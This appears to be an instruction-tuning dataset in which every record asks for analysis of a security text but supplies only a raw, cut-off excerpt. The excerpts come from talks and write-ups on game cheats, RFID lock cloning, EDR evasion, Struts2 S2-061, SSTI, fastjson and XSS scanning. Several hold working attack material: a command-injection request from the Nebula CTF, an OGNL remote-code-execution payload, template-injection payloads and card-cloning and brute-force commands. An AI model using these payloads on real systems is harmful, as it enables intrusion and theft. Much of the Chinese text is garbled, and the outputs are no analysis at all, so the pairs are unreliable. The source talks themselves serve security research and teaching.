{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTenProtect))Conficential,)Copyright)@Tencent,)2019) 游戏安全的攻防艺术 joeywzhu@tencent.com) 2019.02) TenProtect))Conficential,)Copyright)@Tencent,)2019) 个人简介  2013至今腾讯游戏业务安全部技术专家)  2005-2012趋势科技架构师)  2005-2008,))开发和设计)PE病毒沙箱)  2008-2012,)开发和设计脚本漏漏洞洞分析引擎)  2013)to)now,)开发和设计游戏安全通用方案)  2011.8)Defcon讲演 Chinese)phishing)at)Defcon19,)Las)Vegas TenProtect))Conficential,)Copyright)@Tencent,)2019) 1.)外挂是什什么 TenProtect))Conficential,)Copyright)@Tencent,)2019) 多少秒扫雷雷能够完成 TenProtect))Conficential,)Copyright)@Tencent,)2019) CrossFire透视外挂 TenProtect))Conficential,)Copyright)@Tencent,)2019) 注:\"为了了适应手游屏幕特点手游上的外挂增加了了射线 CrossFire)手游透视外挂 TenProtect))Conficential,)Copyright)@Tencent,)2019) 外挂的发展史  单机游戏CheatEngine/FPE)  网络游戏)  脱机挂 (WPE/WireShark))  加速/倍攻 (数值异常))  透视/自瞄 )(Hook,)驱动))  炸房/强登)  打金金工作室/代充/代练)  手游模拟器器 TenProtect))Conficential,)Copyright)@Tencent,)2019) 目前中国的外挂行行业运作模式 TenProtect))Conficential,)Copyright)@Tencent,)2019) 中国网游作弊用户分布  越热门的游戏作弊越多)  一些作弊软件卖的很贵)  绝大作弊者都是新进玩家)  60%)作弊发生在网吧)  由于PUBG的影响fps作弊 现在非常流行行) TenProtect))Conficential,)Copyright)@Tencent,)2019) FPS游戏作弊的爆发  PUBG)  在2108年年超过2700款外挂被监控到)  高峰期每天超过100款外挂进行行更更新)  FPS)  2018年年大约有60款以上的FPS生存游戏  所有的游戏都发现有外挂的存在))  APEX)  自02-05发布以来72小时超过1000万玩家)  已经发现超过60外挂在售卖) TenProtect))Conficential,)Copyright)@Tencent,)2019) 月入宝马不不是梦 TenProtect))Conficential,)Copyright)@Tencent,)2019) 2.)外挂技术原理理的讨论 TenProtect))Conficential,)Copyright)@Tencent,)2019) 安全领域的大讨论  软件漏漏洞洞)  游戏bug复制金金币)  客户端逻辑没有服务器器验证)  盗版问题)  网络安全)  报文篡改)  DDOS攻击)  服务器器数据安全)  服务器器入侵)  SQL注入/回档) TenProtect))Conficential,)Copyright)@Tencent,)2019) 暗黑3漏漏洞洞)-)金金币复制 TenProtect))Conficential,)Copyright)@Tencent,)2019) 内存修改型  游戏对象属性  血量量攻击力力怪物等等  修改或调用游戏逻辑  碰撞检测自动瞄准  游戏资源文件  手游/弱联网  本地效果 TenProtect))Conficential,)Copyright)@Tencent,)2019) LOL)改模型 TenProtect))Conficential,)Copyright)@Tencent,)2019) 堡垒之夜/人物透视 TenProtect))Conficential,)Copyright)@Tencent,)2019) 脱机挂/协议模拟  端游)  UnReal)Engine(开源))  外挂工作室)  页游)  Fiddle)  手游 )  离线) TenProtect))Conficential,)Copyright)@Tencent,)2019) 针对腾讯游戏的DDOS  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAlice and Bob are Really Confused David Huerta - DEF CON 23 Photo credit: Robert Young such crypto parties wow nyc much codes so cypherpunks very google trolling many credits: Atsuko Sato Alice wants to talk to Bob, but Eve is being nosey. Alice hears about crypto, goes to a crypto party to learn how to crypto. Sec in the City  24+ Cryptoparties as of July 2015  Varying communities with varying skill levels  Hackerspaces (Alpha One Labs, Fat Cat Fab Lab, NYC Resistor)  Libraries (Brooklyn Public Library, Verso Books)  Art Galleries (Calyx Institute, Babycastles)  Co-working spaces (Harlem Creative Space)  Universities (CUNY Graduate Center, Columbia) Photo credit: Roman Kruglov This is Your New Bible This is canon, everything that came after it is slash fanfic. Key Lessons from 1992  Modelessness: This is why CAD software is always awful; You want to limit the modes a user has to remember theyre in. BUT with a private/un-private set of situations that cant always be avoided and should be handled carefully.  Perceived Stability: Your back-end might be solid but if the front-end isnt, people will assume the whole thing is broken and Seal Team 6 is on their way to bust down your door.  User Testing: Prototype your software and ask people to try it out, change design accordingly.  Metaphors: No one uses a key to unlock a key in the real world. Key Lessons from 2015  Forgive[less]ness: UX tends to focus on allowing people to undo things or bring things back to an original state. Mistakes in crypto are not usually forgivable.  Too many tools: If a chain of tools has to be installed in a particular order people will not do that. If too many steps involved in downloading/verifying/install, multiply by number of tools and you have a problem.  False hope: If theres any chance something could go wrong or some feature might not be available, warn the user.  Confusion through curiosity: Even if you perfectly illustrate a mental model of how something works, the internet will fuck", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n黑无止境  那些年我们绕过的锁 Kevin2600 议程: . 关于锁的那点事 . 开锁@数字时代 . 开锁@无线时代 . 开锁@物联网时代 I . 开锁@物联网时代 II 锁的起源: 历史上最早出现的锁,由木头制成.可以追溯到4000年前 的古埃及. 在随后的罗马世纪, 又出现了由金银铜等材质制成的锁. 这在当时是财富及身份的象征. 在中国仰韶文化遗址中出现过早期的木质锁. 汉朝时出现 了俗称三簧锁的铜质簧片锁可以说是中国锁具发展历上 的一次质的飞越. 锁的类型 锁的结构 起始 错误 正确 开锁 开锁@无线时代 Samsung: Ezon RFID 门锁 分析ing Proxmark3Snoop 门卡和门锁之间的数据交互 Mifare 加密算法Crypto1 可轻易破解..但是... Ezon 门卡 == Mifare classic 1K !!? 但 Mifare UID 可读写卡的出现改变了这一切. 早期的 Mifare 卡 Block 0 in Sector 0 不可写. 只需Sniff 到UID, 便可实现克隆. 连破解Key都省了. 分析数据的交互, 原来 4bytes 的 UID 才是亮点. 真相大白: 视频演示 防暴力破解功能 5 次错误密码, 触发警铃. 4次错误密码, 1次Reset 键呢? HID-Prox2 低频门锁 . 无任何加密和认证机制 . 后端Wiegand 26 bits 协议(包括iClass) . 设施编号 = 21(8 bits) . 卡号 29644 (16 bits) 神器 RFIDler 软件RFID: RF前端由硬件处理, 其余都交给软件负责(调制; 编码) 相对 Proxmark3 来说, 价格便宜的多. 但仅针对低频 125khz /134khz 功能包括: 读写门卡, 模拟门卡, 外接天线, 嗅探门卡和门禁之间的交互 RFIDler 案例: 调制 HID EM4x02 RFIDler 案例: HID 模拟 . 通过 minicom 连接到 RFIDler . 也可通过 rfidler.py 直接跟其交互(import RFIDler) > set tag hid26 > encode 123 87654 hid26 > emulator 视频演示: RFIDler 案例: 完全克隆 . RFIDler 完全支持读写 T55x7; Q5; HITAG .. . 低频门禁卡克隆必备 T55x7 > set tag hid26 > copy T55x7 > clone > 支持多种编码格式 > 可重复擦写10万次之多 视频演示: RFIDler 案例: 暴力枚举 . 特定区域低级别门禁卡号无法访问 . 可以通过暴力枚举的方式实现升级访问目的 github.com/kevin2600/RFIDler-HID26-BruteForce . HID 对每套门禁的卡号分配都有规律可寻 视频演示: BLEKey  RFID 读卡器后门 github.com/LinkLayer/BLEKey 开锁@数字时代 不保险的保险箱 . 电影中破解保险箱时, 喜欢运用各种高大上的科技手段 . 要不就是必须使用各种重型工具: 钳子; 榔头; 斧子; 电锯.. . 其实是可以这样玩的. 传闻 vs 事实 保险箱的第1关: 备用钥匙 保险箱通常用传统钥匙, 来防止密码遗忘. 但却往往是最薄弱的环节... 保险箱的第2关: 复位键 保险箱通常会用复位键来清空密码. 但总出现在不该出现的地方... 保险箱的第3关: 默认密码 保险箱有时还会有默认特权密码. 但用户往往忘记更改 保险箱的第4关: 厂商后门? 厂商喜欢设置后门来防止密码遗忘. 但换来的却是 RTFM.. 指纹识别锁真的安全吗? 指纹识别技术通过读取指纹图像, 然后提取指纹的特征, 最后通过匹配识 别算法得到识别结果. 每个人的指纹是独一无二, 两人之间不存在着相同的手指指纹. 并且每个 人的指纹是固定的, 通常不会发生变化. 指纹识别中使用的模板并非最初的指纹图, 而是由指纹图中提取的关键 特征. 指纹的特性使其广泛运用在门禁系统, 考勤系统中. 基本纹路图案包括: 环型 (Loop); 螺旋型 (whorl) 和弓型 (Arch). 使其 独一无二的是每个纹路的起点, 终点, 分叉等细节特征. 指纹的特性 指纹纹路上都布满了汗腺, 不断分泌汗水, 脂肪和蛋白质. 其分泌物 的粘性强, 挥发慢, 会停留在物体上较长的时间. 手指皮肤组织有很强的再生能力. 在意外刮伤的情况下, 也能在一段 时间后恢复原样. 纹路形状一生都不改变. 指纹识别机 光学指纹识别是通过激光射在手指指纹的凹凸面,并反射回感应器并形成指 纹图片再与之前采集的指纹图片进行比较 当下", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level16 #### About There is a perl script running on port 1616. To do this level, log in as the level16 account with the password level16. Files for this level can be found in /home/flag16. #### Source code ``` #!/usr/bin/env perl use CGI qw{param}; print \"Content-type: text/html\\n\\n\"; sub login { $username = $_[0]; $password = $_[1]; $username =~ tr/a-z/A-Z/; # conver to uppercase $username =~ s/\\s.*//; # strip everything after a space @output = `egrep \"$username\" /home/flag16/userdb.txt 2>&1`; foreach $line (@output) { ($usr, $pw) = split(/:/, $line); if($pw =~ $password) { return 1; } } return 0; } sub htmlz { print(\"<html><head><title>Login resuls</title></head><body>\"); if($_[0] == 1) { print(\"Your login was accepted<br/>\"); } else { print(\"Your login failed<br/>\"); } print(\"Would you like a cookie?<br/><br/></body></html>\\n\"); } htmlz(login(param(\"username\"), param(\"password\"))); ``` #### Solutions ``` echo ${PWD,,} level16@nebula:~$ ${/BIN/GETFLAG>/TMP/11.TXT,,} -sh: ${/BIN/GETFLAG>/TMP/11.TXT,,}: bad substitution level16@nebula:~$ CMD=/BIN/GETFLAG;${CMD,,} getflag is executing on a non-flag account, this doesn't count level16@nebula:~$ cat /tmp/exp.sh #!/bin/bash /bin/getflag>>/tmp/lv16.txt level16@nebula:~$ wget http://localhost:1616/index.cgi?username=%22%3C%2FDEV%2FNULL%3BP%3D%2FTMP%2FEXP.SH%3B%24{P%2C%2C}%3B%23&password= ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPractical Tips for Playing Hide and Seek with Linux EDRs DEFCON 27 @Op_Nomad Zombie Ant Farm ! ! ! ! $ who m Dimitry Snezhkov  Technologist  Member of the X-Force Red Team ü hacking ü tools, research ü all things offensive @Op_Nomad github.com/dsnezhkov Linux Offense: The Context Linux matters  It runs 90% of cloud workloads.  Attacks bypass office networks and land directly in the backend.  Attacks follows maximum ROI (access to data or computing resources).  Linux Adversarial efforts may be focused and targeted.  Defense follows the attacker. Endpoint Detection and Response (EDR) solutions appear in Linux.  Operators have to respond Linux EDRs - A Case of a Mistaken Identity  Pure play EDR products  Heuristic engine in Antivirus  Security Automation toolkits  Deployment / Patch Management  Side gig for app whitelisting solutions  As features of DLP products  Home grown monitoring frameworks  Tool assisted Threat Hunting. Who in the world am I? Ah, that's the great puzzle. No, you are not Have a good day. Blue I am in your Linux box Operator has to address:  Initial foothold mechanism viability. Immediate detection.  Logging of activities, delayed interception and analysis.  Behavioral runtime patterns that trigger heuristics.  Persistent readiness for the long haul.  Evade Automation  Deflect tool assisted threat hunting  Proactive Supervision Context  Quiet boxes. Reliance on behavioral anomaly.  Locked down boxes. Reliance on known policy enforcement.  Peripheral sensors, honeypots. Linux Offense: Strategic Sketches Operational evasion:  Operationally shut down EDRs.  Directly exploit EDRs.  Blind EDR reporting and response.  Operationally confuse EDRs Targeted behavior evasion:  Target execution confusion.  Bypass EDR detection with novel ways of target exploitation  Deflect artifact discovery by Manual or Tool Assisted Threat hunting. Strategic Goals and Objectives, Distilled  Choice: Drop ready offensive tools on the target Ø May be outright detected. The unk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.14 .\\\" .\\\" Standard preamble: .\\\" ======================================================================== .de Sh \\\" Subsection heading .br .if t .Sp .ne 5 .PP \\fB\\\\$1\\fR .PP .. .de Sp \\\" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Vb \\\" Begin verbatim text .ft CW .nf .ne \\\\$1 .. .de Ve \\\" End verbatim text .ft R .fi .. .\\\" Set up some character translations and predefined strings. \\*(-- will .\\\" give an unbreakable dash, \\*(PI will give pi, \\*(L\" will give a left .\\\" double quote, and \\*(R\" will give a right double quote. | will give a .\\\" real vertical bar. \\*(C+ will give a nicer C++. Capital omega is used to .\\\" do unbreakable dashes and therefore won't be available. \\*(C` and \\*(C' .\\\" expand to `' in nroff, nothing in troff, for use with C<>. .tr \\(*W-|\\(bv\\*(Tr .ds C+ C\\v'-.1v'\\h'-1p'\\s-2+\\h'-1p'+\\s0\\v'.1v'\\h'-1p' .ie n \\{\\ . ds -- \\(*W- . ds PI pi . if (\\n(.H=4u)&(1m=24u) .ds -- \\(*W\\h'-12u'\\(*W\\h'-12u'-\\\" diablo 10 pitch . if (\\n(.H=4u)&(1m=20u) .ds -- \\(*W\\h'-12u'\\(*W\\h'-8u'-\\\" diablo 12 pitch . ds L\" \"\" . ds R\" \"\" . ds C` \"\" . ds C' \"\" 'br\\} .el\\{\\ . ds -- \\|\\(em\\| . ds PI \\(*p . ds L\" `` . ds R\" '' 'br\\} .\\\" .\\\" If the F register is turned on, we'll generate index entries on stderr for .\\\" titles (.TH), headers (.SH), subsections (.Sh), items (.Ip), and index .\\\" entries marked with X<> in POD. Of course, you'll have to process the .\\\" output yourself in some meaningful fashion. .if \\nF \\{\\ . de IX . tm Index:\\\\$1\\t\\\\n%\\t\"\\\\$2\" .. . nr % 0 . rr F .\\} .\\\" .\\\" For nroff, turn off justification. Always turn off hyphenation; it makes .\\\" way too many mistakes in technical documents. .hy 0 .if n .na .\\\" .\\\" Accent mark definitions (@(#)ms.acc 1.5 88/02/08 SMI; from UCB 4.2). .\\\" Fear. Run. Save yourself. No user-serviceable parts. . \\\" fudge factors for nroff and troff .if n \\{\\ . ds #H 0 . ds #V .8m . ds #F .3m . ds #[ \\f1 . ds #] \\fP .\\} .if t \\{\\ . ds #H ((1u-(\\\\\\\\n(.fu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Struts2 S2-061 Remote Code Execution Vulnerablity (CVE-2020-17530) [中文版本(Chinese version)](README.zh-cn.md) In the versions prior to Struts 2.5.25, when evaluated on raw user input in tag attributes, may lead to remote code execution. This vulnerability is the bypass of the OGNL sandbox, which enhance after S2-059. References: - https://cwiki.apache.org/confluence/display/WW/S2-061 - https://github.com/ka1n4t/CVE-2020-17530 - https://www.anquanke.com/post/id/225252 - https://mp.weixin.qq.com/s/RD2HTMn-jFxDIs4-X95u6g ## Setup Start a Struts 2.5.25 server: ``` docker compose up -d ``` After the environment is started, visit `http://your-ip:8080/` and you will see a simple page. It is just a copy application of the [S2-059](https://github.com/vulhub/vulhub/tree/master/struts2/s2-059), except for the different Struts versions. ## Exploit Send the following request to execute the `id` command: ``` POST /index.action HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Length: 829 ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name=\"id\" %{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"id\")).(#execute=#instancemanager.newInstance(\"freemarker.templa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCANSPY: a Platform for Auditing CAN Devices Arnaud Lebrun Airbus Defence and Space arnaud.lebrun@airbus.com Jonathan-Christofer Demay Airbus Defence and Space jcdemay@airbus.com ABSTRACT In the past few years, several tools have been released allowing hobbyists to connect to CAN buses found in cars. This is welcomed as the CAN protocol is becoming the backbone for embedded computers found in smartcars. Its use is now even spreading outside the car through the OBD-II connector: usage-based policies from insurance companies, air-pollution control from law enforcement or engine diagnostics from smartphones for instance. Nonetheless, these tools will do no more than what professional tools from automobile manufacturers can do. In fact, they will do less as they do not have knowledge of upper-layer protocols. Security auditors are used to dealing with this kind of situation: they reverse-engineer protocols before implementing them on top of their tool of choice. However, to be efficient at this, they need more than just being able to listen to or interact with what they are auditing. Precisely, they need to be able to intercept communications and block them, forward them or modify them on the fly. This is why, for example, a platform such as Burp Suite is popular when it comes to auditing web applications. In this talk, we present CANSPY, a platform giving security auditors such capabilities when auditing CAN devices. Not only can it block, forward or modify CAN frames on the fly, it can do so autonomously with a set of rules or interactively using Ethernet and a packet manipulation framework such as Scapy. It is also worth noting that it was designed to be cheap and easy to build as it is mostly made of inexpensive COTS. Last but not least, we demonstrate its versatility by turning around a security issue usually considered when it comes to cars: instead of auditing an electronic control unit (ECU) through the OBD-II connector, we are going to partially emulate ECUs in ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH create_module 2 \"\" .SH NAME create_module - 生成一条可加载模块记录. .SH 总览 .B #include <linux/module.h> .sp caddr_t create_module(const char *name, size_t size); .SH 描述 create_module试图生成一条可加载模块的记录并保留用来容纳模块的内核空间内存.该 系统调用只对超级用户开放. .SH 返回值 成功时返回模块驻留的内核空间地址,错误时返回-1,errno被相应设置. .SH 错误 .TP EPERM 用户非超级用户. .TP EEXIST 相同名字的模块已经存在. .TP EINVAL 要求的大小即使对模块的头信息来说也太小. .TP ENOMEM 内核无法给模块分配足够的连续的内存块. .TP EFAULT name 越出了程序可访问的地址空间. .SH \"雷勇\" <nsinit@263.net>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDan Haagman, InfoSecurity 2009 HACKING FROM WEB APPS 7Safe Company Overview 2009 Secure Coding Course,  7Safe 6/11/2010 Hacking Oracle from web apps 1 Sumit Siddharth Aleksander Gorkowienko 7Safe, UK Dan Haagman, InfoSecurity 2009 Pentesters @7safe Specialize in Application Security About US 7Safe Company Overview 2009 Secure Coding Course,  7Safe 6/11/2010 Hacking Oracle from web apps 2 Speaker at Defcon, OWASP Appsec, Troopers, Sec-T etc Not an Oracle Geek Dan Haagman, InfoSecurity 2009 What this presentation will be about? ;-) ... No no no. 7Safe Company Overview 2009 Secure Coding Course,  7Safe 6/11/2010 Hacking Oracle from web apps 3 No no no. Not this time ;-) Dan Haagman, InfoSecurity 2009 Exploiting SQL Injections from web apps against Oracle database  Introduction [5 mins]  PL/SQL vs SQL Injection [5 mins]  Extracting Data [5 mins] The real agenda ;-) 7Safe Company Overview 2009 Secure Coding Course,  7Safe 6/11/2010 Hacking Oracle from web apps 4  Extracting Data [5 mins]  Privilege Escalation [5 mins]  OS Code Execution [15 mins]  Second Order Attacks [10 mins] PCI Compliance and SQL Injection [10 min] Dan Haagman, InfoSecurity 2009 The talk presents the work of a number of Oracle security researchers in the context of web application security. Specially David Litchfield About the talk 7Safe Company Overview 2009 Secure Coding Course,  7Safe 6/11/2010 Hacking Oracle from web apps 5 Specially David Litchfield Other researchers we would like to thank:  Alexander Kornbrust  Ferruh Mavituna Dan Haagman, InfoSecurity 2009 Oracle database installation comes with a number of default packages, procedures, functions etc. By default these procedures/functions run with the privilege of definer To change the execution privileges from definer to Oracle Privileges 7Safe Company Overview 2009 Secure Coding Course,  7Safe 6/11/2010 Hacking Oracle from web apps 6 To change the execution privileges from definer to invoker keyword AUTHID CURRENT_USER must be defined. Dan H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGolang中的SSTI Go的标准库有两个模板引擎, 分别是 text/template 和 html/template , 两者接致, 区别在于 html/template 般于成 HTML 输出, 它会动转义 HTML 标签, 于防范如 XSS 这样的攻击 0x01 init... 从个题: 先把题的代码敲出来 package main import ( \"bufio\" \"html/template\" \"log\" \"os\" \"os/exec\" ) type Program string func (p Program) Secret(test string) string { out, _ := exec.Command(test).CombinedOutput() return string(out) } func (p Program) Label(test string) string { return \"This is \" + string(test) } func main() { reader := bufio.NewReader(os.Stdin) text, _ := reader.ReadString('\\n') tmpl, err := template.New(\"\").Parse(text) if err != nil { log.Fatalf(\"Parse: %v\", err) } tmpl.Execute(os.Stdin, Program(\"Intigriti\")) } 代码量很少, 很明显的模板注, 问题是怎么构造 payload 去调 Secret 法执命令 0x02 loading... 快捷键进 html/template 的代码时 vscode 动打开了官档地址, 代码路径也提示了, 两者结合起来看 https://pkg.go.dev/html/template?utm_source=gopls 些从档中了解到的常识: . 模板的占位符为 {{语法}} , 这的 语法 官称之为 Action , 其内部不能有换但可以写注释,注释可以有换 . 特殊的 Action : {{.}} ,中间的点表示当前作域的当前对象, 类似 JAVA 中的 this 关键字 . Action 中持定义变量,命名以 $ 开头,如 $var = \"test\" ,有个较特殊的变量 $ ,代表全局作域的全局变量,即在调模板引 擎的 Execute() 法时定义的值,如 {{$}} 在上的题中获取到的值就是 Intigriti . . Action 中内置了些基础语法,如常的语法,如判断 if else ,或且 or and not ,元较 eq ne ,输出 print printf println 等等,除此之外还有些常的编码函数如 urlescaper,attrescaper,htmlescaper  . Action 中持类似 unix 下的管道符法, | 前的命令会将运算结果(或返回值)传递给后个命令的最后个位置 有些前置知识后结合代码再看,测试单元能找到很多具体的法 如内部法调: 查看对应的法 参数名参数类型都对得上,在题中进尝试: 0x03 loaded Done, 上提到 Action 中是持管道符的, 所以答案可以是: {{.Secret \"whoami\"}} {{\"whoami\"| .Secret}} 0x04 in the end 些思考 1.假设代码中没有可命令执的函数是否可以通过模板本身持的语法到 rce ? 不可以, 模板本身持的语法很有限, 并不持动态导其他标准库并调( Go 是编译型语...),不过可以关注下其他函数,如 件读写,络请求等等,条条路通 RCE ... 2.盒怎么挖掘? 关注代码是否导 text/template 或 html/template ,解析的本或件内容是否外部可控值得提的是 gosec 有关注 html/template 的安全问题,但只是检测输出的内容是否在做了转义,没有关注模板注的问题,默认是扫不到这个漏洞的,基于原代 码修改下即可完成盒扫描插件的编写 3.盒怎么挖掘? 引擎中络请求相关的法,法通过dnslog/httplog的式盲测漏洞,但其本身持些编码函数,有回显的场景可通过表达式判 断是否存在漏洞 payload 如下,执后回显的值为 95272022 {{println 0B101101011011011110001010110}} rcefuzzer在配置 paramPollution.expr 中加条 payload 即可 {{println 0B101101011011011110001010110}}|95272022 4.对抗相关 该", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/9/27 19:20 Markdoc Preview about:blank 1/12 学习下浅蓝的Hacking JSON议题 回顾fastjson历史漏洞 fastjson1.2.47是通过MiscCodec向名单缓存中put任意类 fastjson1.2.68是的期望类 找实现了AutoCloseable接的类中的危险操作 1.2.68的修复式简单粗暴将 java.lang.Runnable  java.lang.Readable 和 java.lang.AutoCloseable 加了名单那么1.2.80的就是另个期望类异 常类Throwable 2022/9/27 19:20 Markdoc Preview about:blank 2/12 详细分析 浅蓝给了两张图说明他的挖掘思路 关键点就在于反序列化setter method parameter OR public field视autotype时添加类到名单 2022/9/27 19:20 Markdoc Preview about:blank 3/12 给了上图的挖掘思路那么我们就要弄明为什么setter参数公有字段构造函数参数这三个点的类型会被加到名单缓存mapping中 先写个demo来看 import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.util.TypeUtils; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.concurrent.ConcurrentMap; public class Main { public static void main(String[] args) throws Exception { String json2 = new String(Files.readAllBytes(Paths.get(\"1.txt\"))); try { Object parse = JSON.parse(json2); System.out.println(parse); } catch (Exception e) { e.printStackTrace(); } Field mappings = TypeUtils.class.getDeclaredField(\"mappings\"); mappings.setAccessible(true); ConcurrentMap<String, Class<?>> o = (ConcurrentMap<String, Class<?>>) mappings.get(TypeUtils.class); System.out.println(\"----------------\"); o.forEach((k, v) -> { if (k.contains(\"My\")) { System.out.println(k); } }); } } public class MyClass { public String name; } public class MyException extends Throwable { private MyClass clazz; public void setClazz(MyClass clazz) { this.clazz = clazz; } } 我们构造个json来讲解漏洞原理 { \"a\":{ \"@type\":\"java.lang.Exception\", 2022/9/27 19:20 Markdoc Preview about:blank 4/12 \"@type\":\"MyException\", \"clazz\":{}, \"stackTrace\":[] }, \"b\":{ \"@type\":\"MyClass\",\"name\":\"asd\" } } a部分就是众所周知的期望类继承了Exception的MyException类作为type 在 com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class<?>, int) 中 expectClassFlag为true所以会从classloader中加载MyException拿到class 并且期望类不为空时会把标类加到类缓存中 TypeUtils.addMapping(typeName, clazz) 解决完两个type标签之后现在来看clazz标签的解析过程 因为是异常类所以在 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Google CTF - Beginner's Quest (2018) > Cakes... Throughout history they are long promised, not often delivered. Are they real? > > Are they fabrications of an internal system long designed to tease and tempt you with promises of sweet confectionary goodness that will satisfy and delight? Or the realistic truth of the matter. A dark conspiracy involving many clandestine organisations that want to create content and context around the very existence of this delicacy. > > Your task, uncover the truth, find the cake and show it to the world. Set the truth free. > > You do not have to start this undermining of the Cake-World-Order (cWo) without any information. Our informants deep in the field (some no longer with us), have passed on intel about an operative within the cWo known as Wintermuted. Their home is a mess of old technologies, poor Operational Security (Op-Sec) and Internet of Things (IoT) devices that haven't seen updates in decades, despite being released last year. Start with their rubbish bin! Surely there is a letter or toothpaste tube there with some information that'll get you on the inside. > > Your goal is to get the cake in the fridge... Where else would you put cake in your smart home? Various writeups for the 2018 Google CTF Beginner's Quest. My path to the cake: ![path](images/Path.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n这周末抽空写了写之前知识星球宣传说要分享这个经验很多也是看了这个才加的所以趁现在还记得就 先写出来 时间在2020年当时xray的反射型xss扫描很好于是想知道原理好奇探索了下概的xss扫描规则在xss扫 描器成记.md有讲述xray会先发送个随机字符串根据在html/js中反射的位置构造个害的payload判 断标签是否闭合就能判断出是否存在反射xss后验证的payload去构造就好了 xray没开源我就写个了然后加了个爬爬扫通过爬的数据发现很多地还有可以优 化的地看了些公开的xss的报告把很多奇葩条件下的xss扫描都加了进去当时的机器都是2H1G的 机器想提效率了分布式但是由此带来了很多第三的数据库队列什么的更加压迫了我机器的性 能..做了这么多成果也很喜各src微软都有运好也获得了微软1000多的赏 这篇章主要分三部分 xss扫描器经历 程化经历 微软赏经历 xss扫描器经历 检测流程 1. 将参数变为随机数探测随机数是否回显 2. 判断可否xsscontent-type是否是html 3. 再次根据GETPOSTCOOKIE进请求确定参数的回显位置 4. 如果语义分析不到回显的位置可以直接构造个xss看是否存在即可 5. 语义分析得到位置根据不同位置成不同的payload并进次探测最终确认xss是否存在 这部分代码其实早已在w13scan上公开了https://github.com/w-digital-scanner/w13scan/blob/master/W13S CAN/scanners/PerFile/xss.py 不过公开的是第版的代码后我对代码进过多次整改适配了很多种情况 js本内容转义 回显内容在注释,可使换进bypass 多个反射点特殊构造bypass https://brutelogic.com.br/blog/multi-reflection-xss/ 等等.. 程化经历 xss扫描器完毕后加上爬个 简单的流程图如下 整个项整理后到的技术有下个流程很简单麻烦的是容器化和动发布不过这些弄好之后键部署 便很多 后端开始的是 leancloud 服务直接把扫到的数据存 var s1=\"1\\\" 后觉得成果不错就开始写数据库之类的了 构成 现在总结起来的构成有以下使到的技术 域名收集 https://github.com/projectdiscovery/subfinder 域名爆破+验证 https://github.com/boy-hack/ksubdomain 爬 https://github.com/0Kee-Team/crawlergo 后端 django+mongodb 分布式: celery celery状态监控flower 消息队列rabbit MQ 容器化 docker 动发布 fabric 进程监控 supervisor 界和成果 当时做了简单的界填写src的地址等等就可以动监控动爬动扫xss了成果也很喜基本上很多 src的都检测到了 域名搜索 漏洞 会把xss的类型和测试payload展示便知道是哪些法找到xss的 漏洞详情 把请求包详情展示包括发送包因为有时候复现不出来概率是和请求头某些参数有关系 些成果 微软赏经历 当时分布式都是的国内机器扫国外的很多都超时所以就选了微软家国内访问速度还可以当时没想很 多就把微软个官域名加了进去让它去爆破去扫还是有不少的重点是个全部更新次再 去扫都有不样的东 提交漏洞的记录 找到微软的站漏洞提交后它会在每在线服务致谢中展示xss也算噢 它也定义了有赏的站,站在这会得到赏我发现了好个微软主战的xss但都没赏.. 后按部就班的提交给微软咯的有个域名我当时还不知道有赏就当普通的提交了后微软给我发来了赏 计划通知个xss奖励了1200美 - www.office.com - protection.office.com - onedrive.live.com - onedrive.com - portal.azure.com - manage.windowsazure.com - azure.microsoft.com/en-us/blog - portal.office.com - outlook.office365.com - outlook.office.com - outlook.live.com - outlook.com - sharepoint.com - lync.com - officeapps.live.com - www.yammer.com - sway.com - sway.office.com - 